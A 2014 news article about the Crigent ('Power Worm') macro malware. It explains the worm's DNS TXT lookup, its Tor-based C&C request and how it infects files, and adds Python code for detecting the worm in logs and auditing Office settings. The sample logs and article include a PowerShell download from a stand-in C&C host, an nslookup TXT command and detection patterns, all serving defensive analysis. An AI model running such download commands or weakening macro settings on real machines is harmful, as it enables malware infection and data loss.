    MS Word Hacked, Do not open ‘.RTF’ Files – Microsoft Warning!

    By Vikram Singh Rao, March 30, 2014

    Viruses and malware that attack MS Office files are an age-old favourite of hackers, but new technologies such as cloud services bring new sophistication to the methods, as in the case of ‘Crigent’, also known as ‘Power Worm’.

    Instead of dropping its own executable code, ‘Crigent’ uses legitimate technologies such as Windows PowerShell, Google’s public DNS servers and cloud storage such as Dropbox or Microsoft’s OneDrive. Because all of this traffic goes to legitimate services, the activity tends not to stand out to network administrators.

    The attack can be divided into three logical main parts: acquiring the components; running commands; and infecting the files. These are briefly explained as follows.

    Acquiring the components:
    The process starts with a Word or Excel file on the computer that is infected with the worm. The attacker creates one subdomain under each of two domains whose DNS records he controls. Instead of pointing these subdomains at an IP address where the files are stored, the attacker places a text (TXT) record in their DNS entries. The record is then fetched through Google’s public DNS server, which bypasses any blocking applied by the local DNS resolver. The command in Windows is:

    nslookup -querytype=TXT {malicious domain} 8.8.8.8

    In return, the attacker gets two links, each pointing to a legitimate cloud storage service: Dropbox and OneDrive.

    Running commands:
    Tor and Polipo, which are already installed on the machine, are used to reach the command-and-control server. The URL contains two GUIDs:

    {C&C server}/get.php?s=setup&mom={GUID #1}&uid={GUID #2}

    If the GUIDs are correct, a PowerShell script containing all the code needed for the next stage is downloaded.
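The three behaviours described so far (an Office application spawning PowerShell, a TXT lookup sent straight to Google’s resolver, and the two-GUID get.php request) can each be expressed as a detection rule over process-creation logs. The following Python is an added example and is not code from the article or from any published Crigent analysis; the log line layout, the host names, the domain c2-placeholder.invalid and the GUID values are constructed placeholders.

```python
import re
from dataclasses import dataclass

# Constructed process-creation log lines (sample data, not real telemetry).
# The field layout is hypothetical: timestamp host parent=<exe> image=<exe> cmd="<command line>"
SAMPLE_LOG = """\
2014-03-28T10:02:11 host1 parent=WINWORD.EXE image=powershell.exe cmd="powershell.exe -NoProfile -WindowStyle Hidden -File C:\\Users\\a\\AppData\\Local\\Temp\\x.ps1"
2014-03-28T10:02:12 host1 parent=powershell.exe image=nslookup.exe cmd="nslookup -querytype=TXT updates.c2-placeholder.invalid 8.8.8.8"
2014-03-28T10:02:20 host1 parent=powershell.exe image=powershell.exe cmd="powershell.exe -Command (New-Object Net.WebClient).DownloadString('http://c2-placeholder.invalid/get.php?s=setup&mom=3f2504e0-4f89-11d3-9a0c-0305e82c3301&uid=9b2e6e0a-7c1e-4b0f-8f3d-1a2b3c4d5e6f')"
2014-03-28T10:05:00 host2 parent=explorer.exe image=nslookup.exe cmd="nslookup www.example.com"
2014-03-28T10:06:00 host2 parent=cmd.exe image=nslookup.exe cmd="nslookup -querytype=MX example.com 8.8.8.8"
"""

LINE_RE = re.compile(
    r'^(?P<ts>\S+) (?P<host>\S+) parent=(?P<parent>\S+) image=(?P<image>\S+) cmd="(?P<cmd>.*)"$'
)
GUID = r"[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}"
# Shape of the C&C request quoted in the article: get.php?s=setup&mom={GUID}&uid={GUID}
C2_RE = re.compile(r"get\.php\?s=setup&mom=" + GUID + "&uid=" + GUID)
TXT_RE = re.compile(r"-querytype=TXT\b", re.IGNORECASE)
PUBLIC_RESOLVERS = {"8.8.8.8", "8.8.4.4"}      # Google public DNS, as used by the worm
OFFICE_APPS = {"winword.exe", "excel.exe"}


@dataclass
class Finding:
    host: str
    ts: str
    indicator: str
    detail: str


def scan_log(text):
    """Return one Finding per matched indicator, in log order."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                       # ignore lines that do not fit the layout
        ts, host, parent, image, cmd = m.group("ts", "host", "parent", "image", "cmd")
        parent_l, image_l = parent.lower(), image.lower()
        # 1. Word/Excel launching PowerShell: the macro stage handing over to the script stage.
        if parent_l in OFFICE_APPS and image_l == "powershell.exe":
            findings.append(Finding(host, ts, "office_spawns_powershell", f"{parent} -> {image}"))
        # 2. TXT record fetched directly from a public resolver, bypassing the local DNS server.
        if image_l == "nslookup.exe" and TXT_RE.search(cmd):
            if cmd.split()[-1] in PUBLIC_RESOLVERS:
                findings.append(Finding(host, ts, "txt_lookup_via_public_dns", cmd))
        # 3. The setup request carrying the two GUIDs.
        c2 = C2_RE.search(cmd)
        if c2:
            findings.append(Finding(host, ts, "c2_setup_url_shape", c2.group(0)))
    return findings


def hosts_needing_triage(findings, min_distinct=2):
    """Hosts showing at least `min_distinct` different indicators; a single nslookup is weak evidence."""
    by_host = {}
    for f in findings:
        by_host.setdefault(f.host, set()).add(f.indicator)
    return sorted(h for h, inds in by_host.items() if len(inds) >= min_distinct)


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f.ts} {f.host} {f.indicator}: {f.detail}")
    print("triage:", hosts_needing_triage(scan_log(SAMPLE_LOG)))
```

A lone TXT query to 8.8.8.8 is not proof of infection, which is why `hosts_needing_triage` only raises hosts that show two or more distinct indicators; host2 in the sample, which runs an MX lookup against Google DNS, produces nothing.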

    Infecting the files:
    First, Crigent lowers the security settings of Microsoft Office by using PowerShell to modify the registry. Secondly, it disables all ‘alerts’ and ‘Macros’ warnings so that the user is not alarmed. Thirdly, it searches for all Word and Excel files on the computer, converts every .DOCX and .XLSX file to .DOC and .XLS respectively, and adds a Visual Basic module to each of them. Then it deletes all the original files. When these files are opened, a chain reaction of infections starts which destroys all the files and makes them useless to the user, resulting in the potential loss of important data.

    These attacks can be avoided by being vigilant and by removing any Tor and Polipo software. Microsoft Office has used the .DOCX and .XLSX file extensions by default since 2007, so the presence of a large number of files in .DOC or .XLS format, if not created intentionally, should be treated as suspicious as well.
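The .DOC/.XLS heuristic above, together with a check of the Office macro settings the worm lowers, as an added Python example that is not code from the article. It assumes the relevant Office settings are the VBAWarnings and AccessVBOM values found under HKCU\Software\Microsoft\Office\<version>\<App>\Security (VBAWarnings 1 = run all macros, 2 = disable with notification, which is the default; AccessVBOM 1 = scripts may edit VBA projects, which is what injecting a module requires). The settings snapshots and file listings are constructed so the check runs anywhere without a real registry; on a Windows host the same dicts would be filled from `winreg`.

```python
import os
from collections import Counter
from datetime import datetime, timedelta

LEGACY = {".doc", ".xls"}        # pre-2007 binary formats the worm converts files into
MODERN = {".docx", ".xlsx"}      # the defaults since Office 2007
SAFE_VBAWARNINGS = {2, 3, 4}     # anything but "enable all macros"


def audit_office_security(settings):
    """settings: {app: {"VBAWarnings": int, "AccessVBOM": int}} -> list of issue strings.
    Shaped like HKCU\\Software\\Microsoft\\Office\\<ver>\\<App>\\Security (assumed relevant values)."""
    issues = []
    for app, vals in settings.items():
        warn = vals.get("VBAWarnings", 2)            # absent value means the default (2)
        if warn not in SAFE_VBAWARNINGS:
            issues.append(f"{app}: VBAWarnings={warn} (all macros run without a prompt)")
        if vals.get("AccessVBOM", 0) == 1:
            issues.append(f"{app}: AccessVBOM=1 (scripts may inject VBA modules)")
    return issues


def _ext(path):
    return os.path.splitext(path)[1].lower()


def legacy_format_ratio(paths):
    """Share of Office documents that are in .doc/.xls rather than .docx/.xlsx."""
    counts = Counter(_ext(p) for p in paths)
    legacy = sum(counts[e] for e in LEGACY)
    total = legacy + sum(counts[e] for e in MODERN)
    return legacy / total if total else 0.0


def suspicious_conversion(entries, now, window=timedelta(hours=24),
                          ratio_threshold=0.8, min_files=10):
    """entries: list of (path, mtime). True when most Office files are legacy-format AND
    nearly all of those were written within `window`: a mass conversion, not an old archive."""
    office = [(p, t) for p, t in entries if _ext(p) in LEGACY | MODERN]
    if len(office) < min_files:
        return False
    ratio = legacy_format_ratio([p for p, _ in office])
    legacy_times = [t for p, t in office if _ext(p) in LEGACY]
    if not legacy_times:
        return False
    recent = sum(1 for t in legacy_times if now - t <= window)
    return bool(ratio >= ratio_threshold and recent / len(legacy_times) >= 0.9)


# Constructed sample data (not from any real host).
NOW = datetime(2014, 3, 30, 12, 0)
INFECTED_HOST = [(f"C:/Users/a/Docs/report{i}.doc", NOW - timedelta(minutes=i)) for i in range(12)] \
    + [("C:/Users/a/Docs/notes.docx", NOW - timedelta(days=40))]
ARCHIVE_HOST = [(f"C:/Archive/old{i}.xls", NOW - timedelta(days=3000 + i)) for i in range(12)] \
    + [("C:/Users/b/plan.xlsx", NOW)]
NORMAL_HOST = [(f"C:/Users/c/f{i}.docx", NOW - timedelta(hours=i)) for i in range(12)]
WEAKENED = {"Word": {"VBAWarnings": 1, "AccessVBOM": 1}, "Excel": {"VBAWarnings": 1, "AccessVBOM": 1}}
DEFAULT = {"Word": {"VBAWarnings": 2, "AccessVBOM": 0}, "Excel": {"VBAWarnings": 2, "AccessVBOM": 0}}

if __name__ == "__main__":
    for name, host in [("infected", INFECTED_HOST), ("archive", ARCHIVE_HOST), ("normal", NORMAL_HOST)]:
        print(name, "mass conversion:", suspicious_conversion(host, NOW))
    print("weakened settings:", audit_office_security(WEAKENED))
    print("default settings:", audit_office_security(DEFAULT))
```

The time window matters: a share drive full of decade-old .xls files also has a high legacy ratio, which is why `suspicious_conversion` additionally requires that the legacy files were written recently, as they would be when the worm rewrites and then deletes the originals.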
